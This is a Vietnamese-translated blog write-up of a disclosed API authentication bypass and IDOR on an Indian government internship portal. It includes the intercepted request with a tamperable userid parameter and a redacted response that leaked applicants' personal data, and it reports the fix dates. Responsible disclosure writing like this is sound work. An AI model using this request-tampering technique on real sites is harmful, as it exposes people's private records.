Bỏ qua xác thực API trên Trung tâm Tin học Quốc gia
Này các Hacker !!! Tên tôi là Krishnadev P Melevila. Tôi là một người kiểm tra khả năng thâm nhập ứng dụng web 20 tuổi. Để biết thêm chi tiết, hãy tìm kiếm tên của tôi trên Google.
Lỗ hổng bảo mật: Bỏ qua xác thực API
Tác động: Zero Day
Rủi ro: Rò rỉ dữ liệu nhạy cảm được xâu chuỗi với IDOR
Ưu tiên: P0
Phạm vi: Chi tiết học vấn, Số điện thoại, Mật khẩu được mã hóa, Mã thông báo, Chi tiết nhạy cảm cá nhân

Trước hết, tôi sẽ cho bạn biết làm thế nào tôi đến với lỗ hổng này.
Như thường lệ, khi lướt qua Instagram, tôi biết đến một cơ hội thực tập mùa hè do National Informatics Centre cung cấp thông qua trang web vidyakosh.nic.in . Không chờ đợi nữa, tôi nhảy vào ứng tuyển. Nhưng sau khi điền tất cả các bước của đơn đăng ký, Nó cho tôi thấy một thông báo rằng Nó chỉ áp dụng cho học sinh năm 3. Vì tôi là một BTech năm nhất. sinh viên, tôi không đủ điều kiện để áp dụng cho nó.
Vì vậy, tôi trở nên buồn,
Nhưng, tôi không bao giờ quyết định lùi bước, Thay vào đó, tôi đã bật chế độ hacker của mình lên !!!
Làm thế nào tôi đạt được báo cáo này?
Tôi đã thấy bài đăng trên Instagram của NIC về kỳ thực tập mùa hè. Sau đó tôi nhanh chóng chạy đến để áp dụng nó. Nhưng thật không may, kỳ thực tập chỉ dành cho BTech năm thứ 3. học sinh đạt 60% điểm. Tôi là sinh viên năm thứ nhất. Vì vậy, tôi trở nên thất vọng. Nhưng niềm đam mê của tôi đã đánh thức tôi và bắt đầu dồn nén trang web này và tìm đến lỗ hổng này. Đây là lỗi thứ hai của tôi tại Trung tâm Tin học Quốc gia. Cái đầu tiên là IDOR trên Trang web Nguồn cung cấp Dân dụng Kerala do NIC phát triển.
Bây giờ hãy đọc báo cáo kỹ thuật!
Các bước tái tạo theo quan điểm của kẻ tấn công
Bước 1: Trong khi điền bước thứ tư của biểu mẫu đơn xin chặn yêu cầu và bạn sẽ nhận được yêu cầu như bên dưới.
POST /public/internship/userdetails HTTP/1.1
Host: vidyakosh.nic.in Cookie: pop=1; laravel_cookie_consent=1; nic_lms_session=<REDACTED> XSRF-TOKEN=<REDACTED>
Content-Length: 56
Sec-Ch-Ua: “ Not A;Brand”;v=”99", “Chromium”;v=”99", “Google Chrome”;v=”99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Sec-Ch-Ua-Platform: “Windows”
Origin: https://vidyakosh.nic.in
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vidyakosh.nic.in/public/internship/internshipstep4 Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ml;q=0.8,hi;q=0.7
Connection: close
userid=13&_token=<REDACTED>
{“message”:[{“id”:1,”fname”:”Manish”,”active”:0,”email”:”<REDACTED>”,”email_otp”:””,”mobile”:”<REDACTED>",”mobile_otp”:””,”arn_no “:””,”gender”:”1",”password”:”<REDACTED>",”created_on”:”2022–04–01 16:32:11",”updated_on”:”2022–04–01 13:40:38",”dob”:”0000–00–00",”father_name”:””,”mother_name”:””,”state_id”:0 ,”dist_id”:0,”adress1":””,”adress2":””,”pin”:0,”session”:””,”s_year”:””,”st atement_purpose”:””,”photo”:””,”sign”:””,”project”:””,”education_pattern”:” “,”institute_category”:0,”institute_name”:””,”institute_adress”:””,”institu e_telephone”:””,”institute_email”:””,”bank_ac_no”:””,”bank_name”:””,”ifsc_c ode”:””,”branch_name”:””,”test”:””,”deleted_at”:null,”remember_token”:”<REDACTED>”,”pursuing_year”:” “,”form_submit_value”:0}]}
Báo cáo vào: 03/04/2022
Bản sửa lỗi một phần được phát hành vào: 03/04/2022
Bản sửa lỗi hoàn chỉnh được phát hành vào: 04/04/2022
Và kỹ sư phần mềm cao cấp đã tham dự báo cáo của tôi cần một lời cảm ơn đặc biệt vì anh ấy rất tận tâm. Ngay khi nhận được tin nhắn của tôi, Anh ấy đã hành động rất nhanh và đưa ra bản sửa lỗi một phần ngay trong đêm đó.
Vì vậy, đó là tất cả các chàng trai,
Đừng quên theo dõi tôi trên các phương tiện truyền thông xã hội và phương tiện truyền thông khác. Ngoài ra, xin hãy cho 50 cái vỗ tay của bạn cho bài viết này và đó là nguồn cảm hứng của tôi để viết nhiều hơn nữa !!
Tôi cần sự hỗ trợ của bạn để viết nhiều hơn, Hãy mua cho tôi một ly cà phê: https://www.buymeacoffee.com/krishnadevpm
Xử lý Instagram của tôi: https://instagram.com/krishnadev_p_melevila
Tay cầm Twitter của tôi: https://twitter.com/Krishnadev_P_M
Tay cầm LinkedIn của tôi: https://www.linkedin.com/in/krishnadevpmelevila/
Trang web Nhân sự của tôi: http://krishnadevpmelevila.com/